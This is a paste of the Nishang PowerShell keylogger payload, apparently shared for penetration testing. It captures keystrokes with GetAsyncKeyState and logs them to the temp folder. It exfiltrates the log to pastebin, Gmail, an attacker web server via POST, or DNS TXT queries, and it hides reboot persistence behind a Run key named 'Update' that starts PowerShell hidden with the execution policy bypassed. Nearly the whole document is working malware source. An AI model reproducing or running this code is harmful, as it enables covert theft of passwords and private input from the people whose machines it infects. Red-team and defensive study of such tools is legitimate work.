SHOW:
|
|
- or go back to the newest paste.
| 1 | <# | |
| 2 | .SYNOPSIS | |
| 3 | Nishang Payload which logs keys. | |
| 4 | ||
| 5 | .DESCRIPTION | |
| 6 | This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. | |
| 7 | The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded | |
| 8 | using the Parse_Key script in nishang. | |
| 9 | ||
| 10 | .PARAMETER persist | |
| 11 | Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access. | |
| 12 | ||
| 13 | .PARAMETER ExfilOption | |
| 14 | The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS". | |
| 15 | ||
| 16 | .PARAMETER dev_key | |
| 17 | The Unique API key provided by pastebin when you register a free account. | |
| 18 | Unused for other options | |
| 19 | ||
| 20 | .PARAMETER username | |
| 21 | Username for the pastebin/gmail account where data would be exfiltrated. | |
| 22 | Unused for other options | |
| 23 | ||
| 24 | .PARAMETER password | |
| 25 | Password for the pastebin/gmail account where data would be exfiltrated. | |
| 26 | Unused for other options | |
| 27 | ||
| 28 | .PARAMETER URL | |
| 29 | The URL of the webserver where POST requests would be sent. | |
| 30 | ||
| 31 | .PARAMETER DomainName | |
| 32 | The DomainName, whose subdomains would be used for sending TXT queries to. | |
| 33 | ||
| 34 | .PARAMETER AuthNS | |
| 35 | Authoritative Name Server for the domain specified in DomainName | |
| 36 | ||
| 37 | .PARAMETER MagicString | |
| 38 | The string which when found at CheckURL will stop the keylogger. | |
| 39 | ||
| 40 | .PARAMETER CheckURL | |
| 41 | The URL which would contain the MagicString used to stop keylogging. | |
| 42 | ||
| 43 | .EXAMPLE | |
| 44 | PS > .\Keylogger.ps1 | |
| 45 | The payload will ask for all required options. | |
| 46 | ||
| 47 | .EXAMPLE | |
| 48 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis | |
| 49 | Use above when using the payload from non-interactive shells and no exfiltration is required. | |
| 50 | ||
| 51 | .EXAMPLE | |
| 52 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php | |
| 53 | Use above for exfiltration to a webserver which logs POST requests | |
| 54 | ||
| 55 | ||
| 56 | .EXAMPLE | |
| 57 | PS > .\Keylogger.ps1 -persist | |
| 58 | ||
| 59 | Use above for reboot persistence. | |
| 60 | ||
| 61 | .LINK | |
| 62 | http://labofapenetrationtester.com/ | |
| 63 | https://github.com/samratashok/nishang | |
| 64 | #> | |
| 65 | ||
| 66 | [CmdletBinding(DefaultParameterSetName="noexfil")] Param( | |
| 67 | [Parameter(Parametersetname="exfil")] | |
| 68 | [Switch] | |
| 69 | $persist, | |
| 70 | ||
| 71 | [Parameter(Parametersetname="exfil")] | |
| 72 | [Switch] | |
| 73 | $exfil, | |
| 74 | ||
| 75 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")] | |
| 76 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] | |
| 77 | [String] | |
| 78 | $CheckURL, | |
| 79 | ||
| 80 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")] | |
| 81 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] | |
| 82 | [String] | |
| 83 | $MagicString, | |
| 84 | ||
| 85 | [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
| |
| 86 | [String] | |
| 87 | $ExfilOption, | |
| 88 | ||
| 89 | [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")] | |
| 90 | [String] | |
| 91 | $dev_key = "null", | |
| 92 | ||
| 93 | [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] | |
| 94 | [String] | |
| 95 | $username = "null", | |
| 96 | ||
| 97 | [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] | |
| 98 | [String] | |
| 99 | $password = "null", | |
| 100 | ||
| 101 | [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")] | |
| 102 | [String] | |
| 103 | $URL = "null", | |
| 104 | ||
| 105 | [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] | |
| 106 | [String] | |
| 107 | $DomainName = "null", | |
| 108 | ||
| 109 | [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")] | |
| 110 | [String] | |
| 111 | $AuthNS = "null" | |
| 112 | ||
| 113 | ) | |
| 114 | ||
| 115 | ||
| 116 | ||
| 117 | $functions = {
| |
| 118 | ||
| 119 | function script:Keylogger | |
| 120 | {
| |
| 121 | Param ( | |
| 122 | [Parameter(Position = 0, Mandatory = $True)] | |
| 123 | [String] | |
| 124 | $MagicString, | |
| 125 | ||
| 126 | [Parameter(Position = 1, Mandatory = $True)] | |
| 127 | [String] | |
| 128 | $CheckURL | |
| 129 | ) | |
| 130 | ||
| 131 | $signature = @" | |
| 132 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
| |
| 133 | public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| 134 | "@ | |
| 135 | $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru | |
| 136 | $check = 0 | |
| 137 | while ($true) | |
| 138 | {
| |
| 139 | Start-Sleep -Milliseconds 40 | |
| 140 | $logged = "" | |
| 141 | $result="" | |
| 142 | $shift_state="" | |
| 143 | $caps_state="" | |
| 144 | for ($char=1;$char -le 254;$char++) | |
| 145 | {
| |
| 146 | $vkey = $char | |
| 147 | $logged = $getKeyState::GetAsyncKeyState($vkey) | |
| 148 | if ($logged -eq -32767) | |
| 149 | {
| |
| 150 | if(($vkey -ge 48) -and ($vkey -le 57)) | |
| 151 | {
| |
| 152 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
| 153 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
| 154 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
| 155 | {
| |
| 156 | $result = "S-" + $vkey | |
| 157 | } | |
| 158 | else | |
| 159 | {
| |
| 160 | $result = $vkey | |
| 161 | } | |
| 162 | } | |
| 163 | elseif(($vkey -ge 64) -and ($vkey -le 90)) | |
| 164 | {
| |
| 165 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
| 166 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
| 167 | $caps_state = [console]::CapsLock | |
| 168 | if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state) | |
| 169 | {
| |
| 170 | $result = "S-" + $vkey | |
| 171 | } | |
| 172 | else | |
| 173 | {
| |
| 174 | $result = $vkey | |
| 175 | } | |
| 176 | } | |
| 177 | elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222))) | |
| 178 | {
| |
| 179 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
| 180 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
| 181 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
| 182 | {
| |
| 183 | $result = "S-" + $vkey | |
| 184 | } | |
| 185 | else | |
| 186 | {
| |
| 187 | $result = $vkey | |
| 188 | } | |
| 189 | } | |
| 190 | else | |
| 191 | {
| |
| 192 | $result = $vkey | |
| 193 | } | |
| 194 | $now = Get-Date; | |
| 195 | $logLine = "$result " | |
| 196 | $filename = "$env:temp\key.log" | |
| 197 | Out-File -FilePath $fileName -Append -InputObject "$logLine" | |
| 198 | ||
| 199 | } | |
| 200 | } | |
| 201 | $check++ | |
| 202 | if ($check -eq 6000) | |
| 203 | {
| |
| 204 | $webclient = New-Object System.Net.WebClient | |
| 205 | $filecontent = $webclient.DownloadString("$CheckURL")
| |
| 206 | if ($filecontent -eq $MagicString) | |
| 207 | {
| |
| 208 | break | |
| 209 | } | |
| 210 | $check = 0 | |
| 211 | } | |
| 212 | } | |
| 213 | } | |
| 214 | ||
| 215 | function Keypaste | |
| 216 | {
| |
| 217 | Param ( | |
| 218 | [Parameter(Position = 0, Mandatory = $True)] | |
| 219 | [String] | |
| 220 | $ExfilOption, | |
| 221 | ||
| 222 | [Parameter(Position = 1, Mandatory = $True)] | |
| 223 | [String] | |
| 224 | $dev_key, | |
| 225 | ||
| 226 | [Parameter(Position = 2, Mandatory = $True)] | |
| 227 | [String] | |
| 228 | $username, | |
| 229 | ||
| 230 | [Parameter(Position = 3, Mandatory = $True)] | |
| 231 | [String] | |
| 232 | $password, | |
| 233 | ||
| 234 | [Parameter(Position = 4, Mandatory = $True)] | |
| 235 | [String] | |
| 236 | $URL, | |
| 237 | ||
| 238 | [Parameter(Position = 5, Mandatory = $True)] | |
| 239 | [String] | |
| 240 | $AuthNS, | |
| 241 | ||
| 242 | [Parameter(Position = 6, Mandatory = $True)] | |
| 243 | [String] | |
| 244 | $MagicString, | |
| 245 | ||
| 246 | [Parameter(Position = 7, Mandatory = $True)] | |
| 247 | [String] | |
| 248 | $CheckURL | |
| 249 | ) | |
| 250 | ||
| 251 | $check = 0 | |
| 252 | while($true) | |
| 253 | {
| |
| 254 | $read = 0 | |
| 255 | Start-Sleep -Seconds 5 | |
| 256 | $pastevalue=Get-Content $env:temp\key.log | |
| 257 | $read++ | |
| 258 | if ($read -eq 30) | |
| 259 | {
| |
| 260 | Out-File -FilePath $env:temp\key.log -Force -InputObject " " | |
| 261 | $read = 0 | |
| 262 | } | |
| 263 | $now = Get-Date; | |
| 264 | $name = $env:COMPUTERNAME | |
| 265 | $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
| |
| 266 | function post_http($url,$parameters) | |
| 267 | {
| |
| 268 | $http_request = New-Object -ComObject Msxml2.XMLHTTP | |
| 269 | $http_request.open("POST", $url, $false)
| |
| 270 | $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
| |
| 271 | $http_request.setRequestHeader("Content-length", $parameters.length);
| |
| 272 | $http_request.setRequestHeader("Connection", "close")
| |
| 273 | $http_request.send($parameters) | |
| 274 | $script:session_key=$http_request.responseText | |
| 275 | } | |
| 276 | ||
| 277 | function Compress-Encode | |
| 278 | {
| |
| 279 | #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html | |
| 280 | $ms = New-Object IO.MemoryStream | |
| 281 | $action = [IO.Compression.CompressionMode]::Compress | |
| 282 | $cs = New-Object IO.Compression.DeflateStream ($ms,$action) | |
| 283 | $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) | |
| 284 | $pastevalue | ForEach-Object {$sw.WriteLine($_)}
| |
| 285 | $sw.Close() | |
| 286 | # Base64 encode stream | |
| 287 | $code = [Convert]::ToBase64String($ms.ToArray()) | |
| 288 | return $code | |
| 289 | } | |
| 290 | ||
| 291 | if ($exfiloption -eq "pastebin") | |
| 292 | {
| |
| 293 | $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data) | |
| 294 | $pastevalue = [System.Convert]::ToBase64String($utfbytes) | |
| 295 | post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" | |
| 296 | post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" | |
| 297 | } | |
| 298 | ||
| 299 | elseif ($exfiloption -eq "gmail") | |
| 300 | {
| |
| 301 | #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage | |
| 302 | $smtpserver = "smtp.gmail.com" | |
| 303 | $msg = new-object Net.Mail.MailMessage | |
| 304 | $smtp = new-object Net.Mail.SmtpClient($smtpServer ) | |
| 305 | $smtp.EnableSsl = $True | |
| 306 | $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
| |
| 307 | $msg.From = "$username@gmail.com" | |
| 308 | $msg.To.Add("$username@gmail.com")
| |
| 309 | $msg.Subject = $pastename | |
| 310 | $msg.Body = $pastevalue | |
| 311 | if ($filename) | |
| 312 | {
| |
| 313 | $att = new-object Net.Mail.Attachment($filename) | |
| 314 | $msg.Attachments.Add($att) | |
| 315 | } | |
| 316 | $smtp.Send($msg) | |
| 317 | } | |
| 318 | ||
| 319 | elseif ($exfiloption -eq "webserver") | |
| 320 | {
| |
| 321 | $Data = Compress-Encode | |
| 322 | post_http $URL $Data | |
| 323 | } | |
| 324 | elseif ($ExfilOption -eq "DNS") | |
| 325 | {
| |
| 326 | $lengthofsubstr = 0 | |
| 327 | $code = Compress-Encode | |
| 328 | $queries = [int]($code.Length/63) | |
| 329 | while ($queries -ne 0) | |
| 330 | {
| |
| 331 | $querystring = $code.Substring($lengthofsubstr,63) | |
| 332 | Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS" | |
| 333 | $lengthofsubstr += 63 | |
| 334 | $queries -= 1 | |
| 335 | } | |
| 336 | $mod = $code.Length%63 | |
| 337 | $query = $code.Substring($code.Length - $mod, $mod) | |
| 338 | Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS" | |
| 339 | ||
| 340 | } | |
| 341 | ||
| 342 | $check++ | |
| 343 | if ($check -eq 6000) | |
| 344 | {
| |
| 345 | $check = 0 | |
| 346 | $webclient = New-Object System.Net.WebClient | |
| 347 | $filecontent = $webclient.DownloadString("$CheckURL")
| |
| 348 | if ($filecontent -eq $MagicString) | |
| 349 | {
| |
| 350 | break | |
| 351 | } | |
| 352 | } | |
| 353 | } | |
| 354 | } | |
| 355 | } | |
| 356 | ||
| 357 | ||
| 358 | ||
| 359 | $modulename = $script:MyInvocation.MyCommand.Name | |
| 360 | if($persist -eq $True) | |
| 361 | {
| |
| 362 | $name = "persist.vbs" | |
| 363 | $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
| |
| 364 | $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
| |
| 365 | $func = $functions.Tostring() | |
| 366 | Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename
| |
| 367 | Out-File -InputObject $func -Append $env:TEMP\$modulename | |
| 368 | Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename | |
| 369 | Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename | |
| 370 | Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename | |
| 371 | ||
| 372 | New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force | |
| 373 | echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name | |
| 374 | echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name | |
| 375 | ||
| 376 | } | |
| 377 | ||
| 378 | else | |
| 379 | {
| |
| 380 | if ($exfil -eq $True) | |
| 381 | {
| |
| 382 | start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
| |
| 383 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
| |
| 384 | } | |
| 385 | else | |
| 386 | {
| |
| 387 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
| |
| 388 | } | |
| 389 | } |
